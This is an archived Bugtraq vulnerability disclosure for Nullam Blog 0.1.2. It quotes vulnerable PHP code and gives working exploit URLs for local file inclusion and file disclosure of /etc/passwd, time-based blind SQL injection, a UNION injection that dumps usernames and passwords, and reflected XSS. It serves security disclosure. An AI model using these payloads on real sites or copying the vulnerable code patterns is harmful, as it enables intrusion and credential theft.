[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Nullam Blog Multiple Remote Vulnerabilities

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
Subject: Nullam Blog Multiple Remote Vulnerabilities
From: Salvatore Fresta aka Drosophila <drosophilaxxx@xxxxxxxxx>
Date: Thu, 10 Sep 2009 00:50:56 +0200

-- 
Salvatore Fresta aka drosophila
CWNP444351

********   Salvatore "drosophila" Fresta   ********

[+] Application: Nullam Blog
[+] Version: 0.1.2
[+] Website: http://nullam.net/

[+] Bugs: [A] Local File Inclusion
          [B] File Disclosure
          [C] Multiple Blind SQL Injection
          [D] SQL Injection
          [E] Reflected XSS

[+] Exploitation: Remote
[+] Date: 10 Sep 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs

The following flaws are tested on version 0.1.2.
Other versions may also be affected.


- [A] Local File Inclusion

[-] Risk: high
[-] File affected: index.php

This bug allows a guest to include a local file.

...

$static = false;

if(!isset($_GET['p'])) {
        $include = "./pages/news.php";
} else {
        $include = "./pages/" . $_GET['p'] . ".php";
}

...

if(!$static) {
        include($include);
}

...


- [B] File Disclosure

[-] Risk: medium
[-] File affected: index.php

This bug allows a guest to view the content of a
local file.

...

if(isset($_GET['s'])) {
        $static = true;
        $include = "./pages/custom/" . $_GET['s'] . ".html";
}

...

if(!$static) {
        include($include);
} else {
        $pageSmarty = new Smarty;
        $pageSmarty->assign('html', file_get_contents($include));
        
...


- [C] Blind SQL Injection

[-] Risk: medium
[-] File affected: news.php, register.php

These bugs allows a guest to inject SQL statements
into the affected queries.


- [D] SQL Injection

[-] Risk: high
[-] File affected: register.php

This bug allows a guest to inject SQL statements
into the affected query.

...

$result = mysql_query(sprintf("SELECT `uname`,`verified` FROM `users` WHERE 
`verifyHash`='%s' LIMIT 1;", $_GET['v'])) or die(mysql_error());
        if(mysql_numrows($result) != 1) {
                $msg = "Invalid verification hash! If you followed the link you 
received in your email please contact an admin and request a new verification 
email.";
        } else {
                $msg = "User " . mysql_result($result, 0, 'uname') . " 
successfully verified! you may now login using the form on the main page!";
        }
        
...


***************************************************

[+] Code


- [A] Local File Inclusion

http://site/path/index.php?p=../../../../../../etc/passwd%00


- [B] File Disclosure

http://site/path/index.php?s=../../../../../../../etc/passwd%00


- [C] Multiple Blind SQL Injection

http://site/path/index.php?y=1&i=%25-1%25' OR IF(ASCII(CHAR(97)) = 
97,BENCHMARK(10000000000,null),null)%23

http://site/path/index.php?p=register&v=1' OR IF(ASCII(CHAR(97)) = 
97,BENCHMARK(10000000000,null),null)%23


- [D] SQL Injection

http://site/path/index.php?p=register&v=-1' UNION ALL SELECT 
GROUP_CONCAT(uname,0x3a,passwd),2 FROM users%23


- [E] Reflected XSS

http://site/path/index.php?p=error&e=<script>alert('XSS');</script>


***************************************************

[+] Fix

No fix.


***************************************************

Prev by Date: RE: Re: Multiple RDP Connections BSOD DOS
Next by Date: Re: Multiple RDP Connections BSOD DOS
Previous by thread: [ MDVSA-2009:226 ] aria2
Next by thread: [SECURITY] [DSA 1883-1] New nagios2 packages fix several cross-site scriptings
Index(es):
- Date
- Thread